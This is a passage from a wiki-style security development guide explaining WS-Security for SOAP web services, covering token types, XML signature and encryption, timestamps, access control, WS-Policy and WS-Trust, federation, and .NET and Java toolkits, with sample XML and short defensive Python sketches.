&lt;br /&gt;
However, to be useful, the header must carry information that helps secure the message. That means including one or more security tokens (see the Types of tokens section) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. A typical header therefore looks more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the username profile document. Unless the whole token is encrypted, a message that includes a clear-text password should always be transmitted over a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or other user directories that do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password digest: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
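The formula above can be sketched directly with Python’s standard library; the nonce, timestamp, and password values below are made up for illustration – in a real token the nonce is random bytes that are never reused, and the created value comes from the wsu:Created element.&lt;br /&gt;

```python
# Password_Digest = Base64( SHA-1( nonce + created + password ) )
# Illustrative input values only; a real nonce is random and never reused.
import base64
import hashlib

def password_digest(nonce: bytes, created: str, password: str) -> str:
    raw = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")

digest = password_digest(b"\x01\x02\x03\x04", "2005-01-27T16:46:10Z", "secret")
print(digest)  # a 28-character Base64 string (20 SHA-1 bytes, padded)
```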
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens convey binary data, such as X.509 certificates, in a text-encoded format – Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schemas), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
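Resolving such a reference amounts to scanning the document for the element whose wsu:Id matches the URI fragment. A small sketch, using a cut-down envelope and a reference of #s91397860 like the one in the header example above:&lt;br /&gt;

```python
# Find an element by its wsu:Id attribute without knowing the message schema,
# roughly what a processor does when resolving a signature Reference URI.
import xml.etree.ElementTree as ET

WSU_NS = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
WSU_ID = "{%s}Id" % WSU_NS

doc = ET.fromstring(
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:wsu="%s">'
    '<soap:Body wsu:Id="s91397860">payload</soap:Body>'
    '</soap:Envelope>' % WSU_NS
)

def find_by_wsu_id(root, reference_uri):
    wanted = reference_uri.lstrip("#")
    # wsu:Id values must be unique, so the first match is the only match
    return next((el for el in root.iter() if el.get(WSU_ID) == wanted), None)

signed_part = find_by_wsu_id(doc, "#s91397860")
print(signed_part.tag)  # {http://schemas.xmlsoap.org/soap/envelope/}Body
```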
&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to virtually any possible token type (encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was explained earlier, channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
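The effect of canonicalization can be seen with Python’s standard library. Note that xml.etree.ElementTree.canonicalize implements the inclusive C14N transform, not the exclusive EXC-C14N variant that WSS recommends (the two differ in how namespace declarations are inherited), so this is only a sketch of the general idea.&lt;br /&gt;

```python
# Two semantically equivalent serializations of the same element reduce to
# identical bytes after canonicalization (attribute order and quoting are
# normalized), which is what makes a signature over XML well defined.
from xml.etree.ElementTree import canonicalize  # inclusive C14N (Python 3.8+)

serialization_a = '<doc b="2" a="1"></doc>'
serialization_b = "<doc  a='1'   b='2' />"  # different order, quotes, self-closing

assert canonicalize(serialization_a) == canonicalize(serialization_b)
print(canonicalize(serialization_a))  # <doc a="1" b="2"></doc>
```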
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in a programming language. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows references to signing security tokens through the STR mechanism described above, extended by token profiles to accommodate specific token types. A typical signature is shown in the earlier security header example.&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in that case nothing points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and pre-pended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in the earlier security header example.&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via a timestamp mechanism – each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp applies to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
       &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. No mechanism is foreseen to address the clock synchronization issue (which, as was pointed out earlier, is generally not an issue in modern-day systems) – this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
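A receiver-side freshness check over the Created/Expires window shown above can be sketched as follows; the five-minute skew allowance is an illustrative choice, not something the specification mandates.&lt;br /&gt;

```python
# Reject a security header whose timestamp window does not cover the current
# time; the skew allowance compensates for imperfect clock synchronization.
from datetime import datetime, timedelta, timezone

UTC_FORMAT = "%Y-%m-%dT%H:%M:%SZ"

def is_fresh(created, expires, now, skew=timedelta(minutes=5)):
    created_at = datetime.strptime(created, UTC_FORMAT).replace(tzinfo=timezone.utc)
    expires_at = datetime.strptime(expires, UTC_FORMAT).replace(tzinfo=timezone.utc)
    return created_at - skew <= now <= expires_at + skew

now = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
print(is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now))  # True
late = now + timedelta(hours=3)
print(is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", late))  # False
```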
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
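A minimal illustration (in Python, with hypothetical header values) of the receiver's job described above – locate a token attached to the security header, or reject the message if none is found:

```python
import xml.etree.ElementTree as ET

# Namespace URI of the OASIS WSS 1.0 security extensions (wsse); a real
# receiver would have to accept every namespace version it supports.
WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")

def extract_username_token(security_header: str):
    """Return (username, password) from a wsse:UsernameToken, or None if absent."""
    root = ET.fromstring(security_header)
    token = root.find(f".//{{{WSSE}}}UsernameToken")
    if token is None:
        return None  # no acceptable token - the message should be rejected
    return (token.findtext(f"{{{WSSE}}}Username"),
            token.findtext(f"{{{WSSE}}}Password"))
```

A production receiver would of course handle the other token profiles (X.509, SAML, Kerberos) the same way – extract first, then decide whether the token type is acceptable.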
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with a proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks it against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
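The first flavor – checking supplied credentials against a backend user store – can be sketched as follows (Python; the store contents, names, and iteration count are hypothetical):

```python
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 with a per-user salt; the iteration count is an example value.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

# Hypothetical backend user store mapping username -> (salt, password hash).
_salt = os.urandom(16)
USER_STORE = {"alice": (_salt, hash_password("correct horse", _salt))}

def verify_credentials(username: str, password: str) -> bool:
    entry = USER_STORE.get(username)
    if entry is None:
        return False
    salt, stored = entry
    # Constant-time comparison, so the check does not leak timing information.
    return hmac.compare_digest(stored, hash_password(password, salt))
```

Token validation, by contrast, would verify a signature or certificate chain instead of consulting a password store.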
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java bindings for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – WS-SecurityPolicy – for security.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as the user population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust a user’s claim that he has already been authenticated in domain A? There are different aspects of this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and that authentication tokens from one domain are acceptable in another. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and merely the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations which would like to form a partnership but would be reluctant to share customers’ details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing for the exchange of such opaque tokens – an example of Federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are proof-of-concept or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally ships. The next release of WSE, 3.0, is going to coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
